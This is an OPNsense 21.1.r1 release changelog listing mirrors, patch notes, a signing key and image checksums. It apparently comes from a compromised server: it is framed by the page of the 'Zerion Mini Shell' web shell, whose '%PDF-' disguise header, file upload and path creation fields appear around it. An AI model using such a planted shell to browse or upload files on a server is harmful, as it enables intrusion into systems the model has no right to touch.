%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/backups/router/usr/local/opnsense/changelog/
Upload File :
Create Path :
Current File : //proc/self/root/backups/router/usr/local/opnsense/changelog/21.1.r1.htm

<p>Hi there,</p><p>For more than 6 years, OPNsense is driving innovation through modularising and hardening the open source firewall, with simple and reliable firmware upgrades, multi-language support, HardenedBSD security, fast adoption of upstream software updates as well as clear and stable 2-Clause BSD licensing.</p><p>We thank all of you for helping test, shape and contribute to the project! We know it would not be the same without you.  &lt;3</p><p>Download links, an installation guide[<a target="_blank" href="https://docs.opnsense.org/manual/install.html">1</a>] and the checksums for the images can be found below as well.</p><p><ul><li>Europe: <a target="_blank" href="https://opnsense.c0urier.net/releases/21.1/">https://opnsense.c0urier.net/releases/21.1/</a></li><li>US East Coast: <a target="_blank" href="http://mirrors.nycbug.org/pub/opnsense/releases/21.1/">http://mirrors.nycbug.org/pub/opnsense/releases/21.1/</a></li><li>US West Coast: <a target="_blank" href="https://mirror.sfo12.us.leaseweb.net/opnsense/releases/21.1/">https://mirror.sfo12.us.leaseweb.net/opnsense/releases/21.1/</a></li><li>South America: <a target="_blank" href="https://mirror.venturasystems.tech/opnsense/releases/21.1/">https://mirror.venturasystems.tech/opnsense/releases/21.1/</a></li><li>Australia: <a target="_blank" href="http://mirror.as24220.net/opnsense/releases/21.1/">http://mirror.as24220.net/opnsense/releases/21.1/</a></li><li>Full mirror list: <a target="_blank" href="https://opnsense.org/download/">https://opnsense.org/download/</a></li></ul></p><p>Here are the full patch notes against 20.7.7_1:</p><p><ul><li>system: use authentication factory for web GUI login</li><li>system: allow case-insensitive matching for LDAP user authentication</li><li>system: removed unused gateway API dashboard feed</li><li>system: removed spurious comma from certificate subject print and unified underlying code</li><li>system: harden web GUI defaults to TLS 1.2 minimum and strong ciphers</li><li>system: generate a better self-signed certificate for web GUI default</li><li>system: allow self-signed renew for web GUI default (using "configctl webgui restart renew")</li><li>system: allow subdirectories in NextCloud backup (contributed by Lorenzo Milesi)</li><li>system: optionally allow TOTP users to regenerate a token from the password page</li><li>system: set default certificate lifetime to 397 days</li><li>system: relax gateway name validation</li><li>system: display destination port number in firewall log widget (contributed by Team Rebellion)</li><li>system: allow to recover from bad TLS certificate and/or bad settings in console interface assign</li><li>interfaces: defer IPv6 disable in interface code to ensure PPP interfaces do exist</li><li>interfaces: no longer assume configuration-less interfaces can reach static setup code</li><li>interfaces: fix PPP links not linking to linked advanced configuration</li><li>firewall: add live log "host", "port" and "not" filters</li><li>firewall: add manual refresh button to live log</li><li>firewall: create an appropriate max-mss scrub rule for IPv6</li><li>firewall: fix anti-spoof option for separate bridge interfaces</li><li>firewall: relax schedule name validation</li><li>firewall: fix typo in ICMPv6 validation</li><li>firewall: add type 128 to outgoing IPv6 RFC4890 requirements</li><li>firewall: fix minor regression in maintaining target alias file</li><li>firewall: category selector missing caption</li><li>firewall: fix all state value in pfTop (contributed by Lucas Held)</li><li>firewall: remove duplicated destination field in live log</li><li>firewall: add read-only actions to aliases permission (contributed by Manuel Faux)</li><li>reporting: add top talkers to revamped traffic graphs page</li><li>dhcp: hostname validation now includes domain</li><li>dhcp: correct DHCPv6 custom options unsigned integer field (contributed by Team Rebellion)</li><li>dhcp: removed the need for a static IPv4 being outside of the pool (contributed by Gauss23)</li><li>dhcp: add min-secs option for each subnet (contributed by vnxme)</li><li>dhcp: fix sorting of IPv6 static mappings (contributed by vnxme)</li><li>dnsmasq: remove advanced configuration in favour of plugin directory</li><li>dnsmasq: use domain override for static hosts</li><li>firmware: opnsense-code now updates the current directory if nothing was specified</li><li>firmware: opnsense-code now uses flexible make.conf target from tools.git</li><li>firmware: opnsense-update now supports snapshot access via -z option</li><li>firmware: opnsense-update now fixes missing dependencies on the fly</li><li>firmware: repair display of removed packages during release type transition</li><li>firmware: fix some issues with missing repository on server</li><li>firmware: add version output and date to audit logs</li><li>intrusion detection: replace file-based policy changes with detailed filters</li><li>ipsec: NAT with multiple phase 2 (sponsored by m.a.x. it)</li><li>ipsec: prevent VTI interface to hit spurious 32768 limit</li><li>ipsec: allow mixed IPv4/IPv6 for VTI</li><li>ipsec: display remote host in status overview (contributed by garlic17)</li><li>openssh: honour MAX_LISTEN_SOCKS to prevent startup failure</li><li>openvpn: added toggle for block-outside-dns (contributed by Julio Camargo)</li><li>openvpn: hide "openvpn_add_dhcpopts" fields when not parsed via the backend</li><li>openvpn: set default certificate lifetime to 397 days in wizard</li><li>unbound: default to SO_REUSEPORT</li><li>web proxy: add GSuite and YouTube filtering (contributed by Julio Camargo)</li><li>web proxy: lock ACL download to prevent duplicate execution</li><li>mvc: make sure isArraySequential() is only true on array input</li><li>mvc: speed up processing time when over 2000 users are selected in a group</li><li>mvc: allow underscore in filter string (contributed by kulikov-a)</li><li>images: use UFS2 as the default for nano, serial and vga</li><li>images: support UEFI boot in serial image</li><li>ui: add tooltips for service control widget</li><li>ui: move sidebar stage from session to local storage</li><li>plugins: os-bind 1.15[<a target="_blank" href="https://github.com/opnsense/plugins/blob/stable/21.1/dns/bind/pkg-descr">2</a>]</li><li>plugins: os-frr 1.21[<a target="_blank" href="https://github.com/opnsense/plugins/blob/stable/21.1/net/frr/pkg-descr">3</a>]</li><li>src: fix OpenSSL NULL pointer de-reference[<a target="_blank" href="https://www.freebsd.org/security/advisories/FreeBSD-SA-20:33.openssl.asc">4</a>]</li><li>src: fix AES-CCM requests with an AAD size smaller than a single block</li><li>src: introduce HARDEN_KLD to ensure DTrace functionality</li><li>src: fix partial scrub of multicast packages</li><li>src: refine pf_route* behaviour in PF_DUPTO case for shared forwarding</li><li>src: assorted upstream fixes for ipfw, iflib, multicast processing and pf</li><li>ports: libressl 3.2.3[<a target="_blank" href="https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.2.2-relnotes.txt">5</a>][<a target="_blank" href="https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.2.3-relnotes.txt">6</a>]</li><li>ports: nss 3.60.1</li><li>ports: pkg fix for shell keyword by opening root file descriptor</li><li>ports: radvd 2.19[<a target="_blank" href="https://radvd.litech.org/">7</a>]</li><li>ports: sudo 1.9.4p2[<a target="_blank" href="https://www.sudo.ws/stable.html#1.9.4p2">8</a>]</li></ul></p><p>Known issues and limitations:</p><p><ul><li>Installer currently advertises 20.7</li></ul></p><p>The public key for the 21.1 series is:</p><p><pre>-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAtiv4C8TPBnVAxUS+xW3W
uYhAOuLCZPA6F22Qatit4PVHI7AzfLbGjCQFZqjO+HRPVCmeiyggQWE4ZBOQrhbq
Em/NqmnDVos2rdGfEvp5miY4fstebtHI9CPv26QswgO7bsoJuCUoSmtGTbgNXyaF
ueNYTSXNEpWu35tQS830NCLW5Y6elfK99gxmNChlGdlz0wchaSA+myR6xH+TUw8L
D+87Tny/R2guC9Q0XnsKpKeOMxkNh0X3H0GsmcWmyV0rGAiMh6GuJXIN/yhNMkaD
wuHomqxd1OAyGLz9BjDNRKZ+b+y0iVpEx3qsDWlradtf8sUKZHJ96lf0jCRhEPvl
v1+QkAOzsauWBr3UtFbkKfHONpuwb5XVNgAJzFIRrnGhmWRXD7liiShOP4O+KBP1
Dzxs/X0plXgX2hOgzMbtgCMj4M1sV5HhKUrwiyqBpoe5nESJVrQ/DxETwEZIFoHy
hwQxd/DDp7uJmZlCkveuZeUAo7pfTUVchDpe2GB54bHEhIn3OES93PURMQtQxB12
mubV52vcfvzLnbv5FL5lMK/cgl64ip2bRu1jcB3wsKrKcGyUbtYJQDnHpowWrs5h
RdMHSfLyaC8ROMKhZmJTe141wr5p8d+NmgjlDblnNmUJ0jHVJeP0+RO/OcY/o3Zt
2MxL1Yp2cUu2l1HEmyrCsIcCAwEAAQ==
-----END PUBLIC KEY-----</pre></p><p>Please let us know about your experience!</p><p><br>Stay safe,<br> Your OPNsense team</p><p><pre>SHA256 (OPNsense-21.1.r1-OpenSSL-dvd-amd64.iso.bz2) = c6cfdd88227bb58c94634dca01e9108647a83278a4549291a4b772094342c81a
SHA256 (OPNsense-21.1.r1-OpenSSL-nano-amd64.img.bz2) = a60c3cb077b56202d3b02637054607f6180121b7da9faaf870f73a814dcfc2c7
SHA256 (OPNsense-21.1.r1-OpenSSL-serial-amd64.img.bz2) = cba8578d7acbb323fd1fa6fe93d648c5d227010e1169ccbdf1111980d73fa447
SHA256 (OPNsense-21.1.r1-OpenSSL-vga-amd64.img.bz2) = 1fce48c99e5c46d92fca7a00805873154832357c7de71f5035a01ca8047041dc</pre></p>

Zerion Mini Shell 1.0